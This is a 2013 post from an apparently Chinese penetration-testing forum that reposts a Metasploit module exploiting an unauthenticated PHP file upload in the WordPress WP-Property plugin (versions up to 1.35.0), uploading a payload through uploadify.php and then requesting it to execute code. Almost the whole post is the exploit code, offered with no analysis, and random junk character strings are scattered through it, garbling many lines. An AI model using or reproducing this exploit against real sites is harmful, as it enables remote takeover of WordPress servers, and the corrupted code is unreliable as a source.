中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞, X  y( n* h1 C/ Q
9 B8 b# T$ i+ S5 W1 \
## # This file is part of the Metasploit Framework and may be subject to
" T( _3 g! Q: f) |2 Z  g
& f" t1 E3 l  C" Z: H# redistribution and commercial restrictions. Please see the Metasploit
+ w* e5 R+ V) d$ d6 ~4 q7 a, K' @5 X# G' ?
# Framework web site for more information on licensing and terms of use.: S# `3 E, G) ^8 Q& d8 X
! k1 [$ f; j! ]; G
#   http://metasploit.com/framework/ ##$ b/ e& S3 F$ |& O5 N& F( ^" L  c

4 W4 C. E4 g7 c
/ d8 _7 d' v5 R& d! Q, F8 M8 a( I; n# o  S" p4 k

4 o; |) N8 w% B: ]/ [- m+ F+ H6 l
require 'msf/core'9 e# s+ K, d( \$ c) J
require 'msf/core/exploit/php_exe'
  c. k& k' f5 ^# E: m# g: V) N6 u
7 Q' |) _+ I; F8 f: z/ J! y4 gclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',, i) i3 j! @0 `, @, @/ u. F& j" i
'Description'    => %q{) w- a- q: Z+ W! }! M4 l' N7 ], c, W
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
3 M; ]2 }7 c) X, [[
2 K2 ^3 l: s7 @! z'Sammy FORGIT', # initial discovery- P! b; O9 B8 Q' t5 [$ G* J2 L
'James Fitts <fitts.james[at]gmail.com>' # metasploit module  ]: `$ n: E8 Q+ W7 X1 [3 K4 r
],9 q& [) j# n; B& c' g5 @: e
'License'        => MSF_LICENSE,* \/ y  U! g3 Q% \! e
'References'     =>7 O, o/ @+ U& _) G# y! p
[2 O2 |% Y: r+ |& F6 d% S
[ 'OSVDB', '82656' ],. ~5 C( G$ t9 v- D8 s; P. T1 P
[ 'BID', '53787' ],
* A* V) n; D1 V3 E) d8 o/ H( O[ 'EDB', '18987'],
) f9 s6 I, C) [[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
. b) u" a  y% j( H# A) S' E* j],
1 L" L! L1 \# ^6 }! b) `'Payload'        =>  f# V) A. j# u; m/ P9 C6 ]2 A: k
{& M8 a$ h/ }# T6 p
'BadChars' => "\x00",( F" a* s8 Z9 Z% D' s' z
},! H; @2 x; N! T) d2 v! B+ X, j
'Platform'       => 'php',+ N3 D  p& H- [9 U) F% i2 r
'Arch'           => ARCH_PHP,- W; U$ I# o7 [# r3 F
'Targets'        =>0 R# P/ t! k5 A. a% ]% Y
[
# H. J1 N: H5 ^) J1 J& t[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. G# {9 P) S  o2 V# P# I) i
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
1 V6 g4 v* ^6 H# F. |% Z],. K# T# z$ s. m2 O- c/ w. M& e
'DefaultTarget'  => 0,
! r* x& Y: j, k) R6 j% v! R% T'DisclosureDate' => 'Mar 26 2012'))+ m3 r8 ]6 }( ]( n. S7 s/ q
6 T9 G( C. r& d
register_options(
( N. y: x5 b2 }0 {$ l! J3 ][
$ f( t; b9 I" FOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])6 E5 U( ^5 D" M1 e
], self.class)' Z: k; {) y/ `" C% \8 }
end& \8 Q3 Q! @: O! g( a
$ v3 q* ~& K. {4 L( Y& l) s
def check  S  ?4 L9 h- [
uri =  target_uri.path7 }% t4 v5 U* Z& P
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',6 K2 k' Q9 f( a. M) s
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
9 m* \, t, l" q* c5 g+ v})$ v& d# w% x# M# k/ F2 F5 e: T4 U
! f: `2 j! d8 z: R0 p& B/ d
if not res or res.code != 200/ o2 O; S, p( q6 X. V
return Exploit::CheckCode::Unknown
  z9 d8 g  @, q% Cend
' \* q( E+ }6 V, J4 W
# h7 g% n  I' b4 t( g* q- ureturn Exploit::CheckCode::Appears
! R! g) e+ R/ S" {end
3 M% |. k0 G" N0 N& D- U+ V& d4 D/ k! ^$ m* ]
def exploit
2 ^: t9 z; N- q' _( W  buri =  target_uri.path
' n/ j- e" O7 b) c, s' }5 d3 f5 Quri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)" z) Z4 L* a3 v9 }( u( E7 A7 o- I
7 {/ h+ @# P4 d# u* p( Q1 x" a
data = Rex::MIME::Message.new
9 Y2 U" |9 V! m" Ldata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
- H  R1 M  h" R( ~3 R6 Cdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")6 {4 I: h; E8 K7 h
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
" H- t+ b8 [& F- R2 Q4 T% b' d8 l) T
print_status("#{peer} - Uploading payload #{@payload_name}")
! s1 M( V0 i. o3 T" d. S& G6 Lres = send_request_cgi({# d* s( h" T; W/ U2 p
'method' => 'POST',
7 I1 {7 F: V, N& R; u'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",! r1 i. B8 s5 g3 r7 P
'ctype'  => "multipart/form-data; boundary=#{data.bound}",% c6 M. h! ^  ~/ _: z" p
'data'   => post_data  m' E9 o- T8 V9 ~
})* b) B& J3 |4 ^' y9 Q$ {5 |

, S7 u) x, k+ o  f* _  N) {# `if not res or res.code != 200 or res.body !~ /#{@payload_name}/
# y5 Y; U% P0 Mfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")( a# o. C3 e2 h# t) C/ L7 a) i
end1 [# ]( n5 T# t8 F( J

5 d& E# ]: _0 T: z: U! I- Fupload_uri = res.body
6 C5 w% Y6 j: ?
9 j  q3 A2 ], iprint_status("#{peer} - Executing payload #{@payload_name}")
5 j- r4 s1 g% h; Z6 ?% lres = send_request_raw({+ u4 I; p6 X6 n
'uri'    => upload_uri,8 j' Z6 t$ `* V* [0 w2 j  n
'method' => 'GET'
! T/ E4 A& r( o& w4 _6 z0 L})
$ [' ^5 L% _4 q1 send# b; \6 N0 v6 R
end0 `' ?% k' k3 j3 q2 T2 r$ k# u. l
5 C9 [4 I3 C) u& _" h% a
不要问我这写的是什么 怎么利用 我是说msf.# X( i- O/ z5 Q, z9 \
9 X4 X3 N6 K- Z9 D* Z




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2